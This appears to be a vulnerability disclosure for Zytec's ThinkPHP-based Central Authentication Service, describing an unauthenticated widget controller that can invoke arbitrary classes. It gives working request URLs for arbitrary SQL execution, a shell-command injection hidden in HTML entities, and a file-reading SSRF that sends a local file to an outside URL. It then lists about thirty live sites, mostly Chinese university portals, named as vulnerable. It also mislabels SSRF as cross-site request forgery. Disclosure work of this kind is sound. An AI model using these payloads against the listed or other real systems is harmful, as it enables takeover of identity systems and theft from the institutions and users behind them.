Hello, next I will introduce the details of this vulnerability to you.
</br> </br>
    A product with vulnerabilities is: </br>
<h3>Zytec(Da Lian Zhuo Yun Technology ) Central Authentication Service </h3>
Since discovering the vulnerability in this product last time, I have found another one, and it is much more serious.</br></br>
    A Controller of this product has serious design flow, which allows unauthorized attackers to plan a remote attack.</br></br>
The harm he can directly cause includes but is not limited to:<h5> Remote command execution, SQL command execution, SSRF,Arbitrary File Read.</h5>

The affected products is</br></br>
<img src="web.png">
<img src="product1.png"><img src="product2.png">
Let's go straight to the vulnerable code:</br>
Controller: /index.php/auth/widget</br></br><h5>
class Widget extends Base</br>
{</br>
    use Oauth2ClientTrait;</br>
</br>
    public function _empty(){</br>
        $layer = input('get.layer');</br>
        $widget = input('get.widget');</br>
        $action = input('get.action');</br>
        return action($widget.'/'.$action,input(),'widget\\'.$layer);</br>
    }</br>

}</br></br></h5>
This product is developed from the ThinkPHP framework through secondary development.</br></br>
In the empty method provided by the widget controller, all its parameters are controllable. </br></br>The parameters passed to this method are forwarded to the action method, and we continue to follow up to examine the action method.
</br></br><h5>
    function action($url, $vars = [], $layer = 'controller', $appendSuffix = false)</br>
    {</br>
        return app()->action($url, $vars, $layer, $appendSuffix);</br>
    }</br></br></h5>

    It can be seen that this is a native method in ThinkPHP, but with a widget controller, we can pass in any parameters and call any classes and methods we want.</br></br>

    Just like this, without a widget controller, we can only access programs like Application/index/controller/index, and we can only control the controller and module represented by the index position. </br></br>However, now we can access all class files in the Application directory and call their public methods at will, including model, lib, and package.
</br></br>Now we just need to find which programs define the methods we need, then directly instantiate and call them. </br></br>
<h3>
Execute arbitrary SQL commands
</h3>
First, locate the already defined database operation code, and eventually find this program:  appopenmodelAppVisibleRangeModel.php</br></br>
It inherits from BaseModel:<h5>class AppVisibleRangeModel extends BaseModelFollowing BaseModel</h5> this class in turn inherits from Model:</br></br><h5>class BaseModel extends ModelContinuing </h5>to follow, the Model class defines the __call magic method:   </br></br> 
<h5>public function __call($method, $args)    { </br>
           if ('withattr' == strtolower($method)) { </br>
                       return call_user_func_array([$this, 'withAttribute'], $args);</br>
                            } </br>       return call_user_func_array([$this->db(), $method], $args);   </br> }</h5></br></br>
This class is directly instantiated through the widget controller, calling the __call method with two arguments; when calling the __call method, if the passed method is not 'withattr', it will instantiate db and call its method. </br></br>So here, by directly passing the 'query' method along with the SQL statement as the next parameter, you can execute arbitrary SQL commands. 
</br></br>The final payload is:/index.php/auth/widget/__empty/?widget=appopenmodelAppVisibleRangeModel&action=__call&method=query&args[]=select user()
<h3>RCE (Remote Command Execution)</h3>
/index.php/auth/widget/__empty/?widget=app\common\lib\Cmd&action=EXEC_CMD&primary=GIT_CMDS&#38;&#99;&#109;&#100;&#61;&#38;&#112;&#97;&#114;&#97;&#109;&#115;&#91;&#97;&#112;&#112;&#101;&#110;&#100;&#93;&#61;&#124;&#124;&#108;&#115;&echo=true&cwd=/</br></br>

<h3>Cross-Site Request Forgery (SSRF) (with echo, can read any file)</h3>
/index.php/auth/widget/__empty/?widget=app\common\command\Deploy&action=localUpload&filePath=index.php&targetUrl=https://www.baidu.com</br></br>
</br>
</br>
The vulnerable product is a unified identity authentication system, which means attackers can gain administrative privileges for all other systems through this system, so this vulnerability is quite serious!
</br></br><h4>
Websites with vulnerabilities</br></h4>
http://open.oit.edu.cn:8090</br>
http://open.jntc.smilecampus.cn:20080</br>
http://open.wlcbyz.org.cn</br>
http://open.ordosvc.cn:8008</br>
https://open.lnnu.edu.cn</br>
https://open.imac.edu.cn</br>
https://mh.ykvtc.edu.cn</br>
https://open.smilecampus.cn</br>
https://uap.immu.edu.cn</br>
https://dev.lnut.edu.cn</br>
http://58.56.90.180:9600</br>
http://open.dlfy.edu.cn:8008</br>
https://open-lngpi-edu-cn-s.vpn.lngpi.edu.cn:8118</br>
http://223.100.1.201</br>
https://open.xauat-hqc.com</br>
http://ywtb.xafy.edu.cn</br>
https://ywtb.xafa.edu.cn</br>
https://cas.csiic.com</br>
https://uap.bcnu.edu.cn</br>
https://auth.seashell.vip</br>
http://open.dlust.edu.cn</br>
https://sso.dufe.edu.cn</br>
https://portal.dlou.edu.cn</br>
https://open.btsvc.edu.cn</br>
http://my.csnu.edu.cn</br>
https://auth.imnu.edu.cn</br>
https://xgzt.xyafu.edu.cn</br>
https://survey.gsjtxy.edu.cn</br>
https://ncas.jdyfy.com</br>
https://zyzyyys.hnfnu.edu.cn</br>
https://open.dev.zytec.cn</br>
https://open.nwu.edu.cn</br>
http://center.xdxd.cn</br>